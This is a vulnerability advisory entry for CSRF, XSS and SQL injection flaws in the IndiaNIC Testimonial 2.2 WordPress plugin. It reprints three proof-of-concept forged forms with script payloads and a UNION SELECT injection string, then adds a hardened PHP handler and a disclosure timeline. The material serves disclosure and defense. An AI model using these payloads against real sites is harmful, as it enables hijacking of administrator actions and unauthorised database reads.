WordPress IndiaNIC Testimonial Plugin Cross-Site Request Forgery Vulnerability

Vulnerability ID: 1121846    Type: Cross-site request forgery
Published: 2013-09-03    Updated: 2013-09-03
CVE: CVE-2013-5672    CNNVD ID: CNNVD-201308-550
Platform: PHP    CVSS score: 6.8
|Sources
https://www.exploit-db.com/exploits/28054
https://www.securityfocus.com/bid/62109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-550
|Details
WordPress is a blogging platform written in PHP by the WordPress Software Foundation; it lets users host a personal blog on a server running PHP and MySQL. IndiaNIC Testimonial is a client-review (testimonial) plugin for it. Version 2.2 of the IndiaNIC Testimonial plugin for WordPress contains multiple cross-site request forgery vulnerabilities. A remote attacker can use them to hijack the authentication of an administrator for requests that (1) add a testimonial via the iNIC_testimonial_save action, (2) add a listing template via the iNIC_testimonial_save_listing_template action, or (3) add a widget template via the iNIC_testimonial_save_widget action. Through several parameters passed to the wp-admin/admin-ajax.php script, the same requests can be used to inject cross-site scripting sequences. The parameters are: project_name, project_url, client_name, client_city, client_state, description, tags, video_url, is_featured, title, widget_title, no_of_testimonials, filter_by_country, filter_by_tags, and widget_template.
|Exploit
Details
========================
Application: Testimonial
Version: 2.2
Type: Wordpress plugin
Vendor: IndiaNIC
Vulnerability:
- XSS (CWE-79)
- CSRF (CWE-352)
- SQL Injection (CWE-89)

Description
========================
Testimonial Plugin allows you to add, delete, edit and place what others said about your web site. Loaded with unequaled features, this plugin gets you complete control over testimonials.

This is the very first Plug-in which is designed especially keeping our motto in mind that ‘every client is important’. It is an imperative tool for supervising your official website in accordance with your clients.

Vulnerability
========================
This plugin is vulnerable to cross-site request forgery, cross-site scripting and SQL injection.

1. Add testimonial form is vulnerable to CSRF and XSS
2. Add listings template is vulnerable to CSRF, XSS and SQLi
3. Add widget template is vulnerable to CSRF and XSS

Proof of Concept
========================
1. Add testimonial 
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="iNIC_testimonial_save">
    <input type="hidden" name="project_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
    <input type="hidden" name="project_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>">
    <input type="hidden" name="client_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>">
    <input type="hidden" name="client_city" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>">
    <input type="hidden" name="client_state" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>">
    <input type="hidden" name="client_country" value="Belgium">
    <input type="hidden" name="description" value="<script>alert(String.fromCharCode(67,83,82,70,32,54))</script>">
    <input type="hidden" name="tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,55))</script>">
    <input type="hidden" name="video_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,56))</script>">
    <input type="hidden" name="is_featured" value="<script>alert(String.fromCharCode(67,83,82,70,32,57))</script>">
    <input type="submit" value="Save Testimonial">
</form>

2. Add listings template
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="iNIC_testimonial_save_listing_template">
    <input type="hidden" name="id" value="9">
    <input type="hidden" name="title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
    <input type="hidden" name="no_of_testimonial" value="5">
    <input type="hidden" name="list_per_page" value="5">
    <input type="hidden" name="ord_by" value="id">
    <input type="hidden" name="ord_type" value="ASC">
    <input type="hidden" name="custom_query" value="1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#">
    <input type="hidden" name="show_featured_at" value="top">
    <input type="hidden" name="no_of_featured" value="2">
    <input type="hidden" name="featured_template" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
    <input type="hidden" name="listing_template_odd" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
    <input type="hidden" name="listing_template_even" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
    <input type="submit" value="Add Template">
</form>

3. Add widget template
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="iNIC_testimonial_save_widget">
    <input type="hidden" name="widget_title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
    <input type="hidden" name="no_of_testimonials" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>">
    <input type="hidden" name="filter_by_country" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>">
    <input type="hidden" name="filter_by_tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>">
    <input type="hidden" name="widget_template" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>">
    <input type="submit" value="Add Template">
</form>

Solution
========================
No patch has been provided by the vendor. The solution would be to stop using this plugin in a public environment.
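For readers who maintain WordPress plugins, the following is an added example of how an admin-ajax "save testimonial" handler closes the three classes of weakness listed above (missing CSRF token, unsanitized fields, and raw SQL fragments in the listing query). It is not code from the IndiaNIC Testimonial plugin or from the advisory author; the action name, function names and table name are hypothetical, while the WordPress API calls (check_ajax_referer, current_user_can, sanitize_text_field, esc_url_raw, wp_kses_post, $wpdb->insert, $wpdb->prepare, esc_html, esc_url) are the real core functions.

```php
<?php
/*
 * Added example, not the plugin's code: a hardened admin-ajax handler showing
 * the controls the advisory's three findings call for. All action, function
 * and table names here are hypothetical.
 */

// Hypothetical action name; the plugin's own was iNIC_testimonial_save.
add_action( 'wp_ajax_example_testimonial_save', 'example_testimonial_save' );

// The legitimate admin form must emit the nonce this handler checks, e.g.
//   wp_nonce_field( 'example_testimonial_save', '_wpnonce' );
// A form hosted on another site cannot read that value, so a forged
// cross-site POST fails the first check.
function example_testimonial_save() {
    // CSRF: check_ajax_referer() terminates the request (HTTP 403, body -1)
    // when the nonce is missing, expired, or was issued to a different user.
    check_ajax_referer( 'example_testimonial_save', '_wpnonce' );

    // Authorization: a valid session alone is not enough; require a capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // Sanitize each field according to the type it is supposed to hold.
    // wp_unslash() strips the slashes WordPress adds to request data.
    $text = function ( $key ) {
        return sanitize_text_field( wp_unslash( $_POST[ $key ] ?? '' ) );
    };
    $row = array(
        'project_name'   => $text( 'project_name' ),
        'project_url'    => esc_url_raw( wp_unslash( $_POST['project_url'] ?? '' ) ),
        'client_name'    => $text( 'client_name' ),
        'client_city'    => $text( 'client_city' ),
        'client_state'   => $text( 'client_state' ),
        'client_country' => $text( 'client_country' ),
        'description'    => wp_kses_post( wp_unslash( $_POST['description'] ?? '' ) ),
        'tags'           => $text( 'tags' ),
        'video_url'      => esc_url_raw( wp_unslash( $_POST['video_url'] ?? '' ) ),
        'is_featured'    => empty( $_POST['is_featured'] ) ? 0 : 1, // boolean, not free text
    );

    if ( '' === $row['project_name'] ) {
        wp_send_json_error( array( 'message' => 'project_name is required' ), 400 );
    }

    // SQL: $wpdb->insert() builds a prepared statement; the format array pins
    // every value to %s or %d, so request data never reaches the query as SQL.
    global $wpdb;
    $ok = $wpdb->insert(
        $wpdb->prefix . 'example_testimonials', // hypothetical table
        $row,
        array( '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%d' )
    );
    if ( false === $ok ) {
        wp_send_json_error( array( 'message' => 'database error' ), 500 );
    }
    wp_send_json_success( array( 'id' => (int) $wpdb->insert_id ) );
}

// Listing query. The advisory's template PoC passes ord_by, ord_type and
// custom_query straight into SQL. Here the sort column and direction are
// allow-listed, the limit is an integer bound to a %d placeholder, and a
// free-form "custom_query" parameter is simply not offered.
function example_testimonial_listing( $ord_by, $ord_type, $limit ) {
    global $wpdb;
    $columns = array( 'id', 'project_name', 'client_name', 'client_country' );
    if ( ! in_array( $ord_by, $columns, true ) ) {
        $ord_by = 'id';
    }
    $ord_type = ( 'DESC' === strtoupper( (string) $ord_type ) ) ? 'DESC' : 'ASC';
    $limit    = max( 1, min( 100, absint( $limit ) ) );

    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}example_testimonials ORDER BY {$ord_by} {$ord_type} LIMIT %d",
        $limit
    );
    return $wpdb->get_results( $sql, ARRAY_A );
}

// Output: escape at render time as well, so a stored value that bypassed
// input sanitization (or was written by other code) still cannot become markup.
function example_render_testimonial( array $t ) {
    return sprintf(
        '<div class="testimonial"><a href="%s">%s</a> by %s: %s</div>',
        esc_url( $t['project_url'] ),
        esc_html( $t['project_name'] ),
        esc_html( $t['client_name'] ),
        wp_kses_post( $t['description'] )
    );
}
```

The three layers are independent: the nonce check defeats the forged forms in the proof of concept even before the fields are looked at, the capability check stops a lower-privileged logged-in user from reaching the handler, and per-field sanitization plus output escaping means a `<script>` payload in project_name is stored and rendered as inert text. Administrators who cannot modify the plugin should, as the advisory says, disable it; a web application firewall rule that blocks POSTs to admin-ajax.php with these action values and no valid nonce is at best a stopgap.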

Timeline
========================
2013-08-07 - Email sent to IndiaNIC
2013-08-08 - Notification left on the plugin's Support board on wordpress.org
2013-09-01 - No response or patch released. Publicly disclosed
|Affected products
IndiaNIC Testimonial 2.2
|References

Source: XF; Name: indianictestimonial-cve20135672-csrf (86846); Link: http://xforce.iss.net/xforce/xfdb/86846
Source: BID; Name: 62109; Link: http://www.securityfocus.com/bid/62109
Source: EXPLOIT-DB; Name: 28054; Link: http://www.exploit-db.com/exploits/28054
Source: SECUNIA; Name: 54640; Link: http://secunia.com/advisories/54640
Source: MLIST; Name: [oss-security] 20130901 Re: [CVE Request] IndiaNIC Testimonial 2.2 WP plugin; Link: http://seclists.org/oss-sec/2013/q3/531
Source: FULLDISC; Name: 20130901 IndiaNIC Testimonial WP plugin - Multiple vulnerabilities; Link: http://seclists.org/fulldisclosure/2013/Sep/5
Source: packetstormsecurity.com; Link: http://packetstormsecurity.com/files/123036
Source: OSVDB; Name: 96792; Link: http://osvdb.org/96792
Source: BUGTRAQ; Name: 20130901 IndiaNIC Testimonail WP plugin - Multiple vulnerabilities; Link: http://archives.neohapsis.com/archives/bugtraq/2013-09/0006.html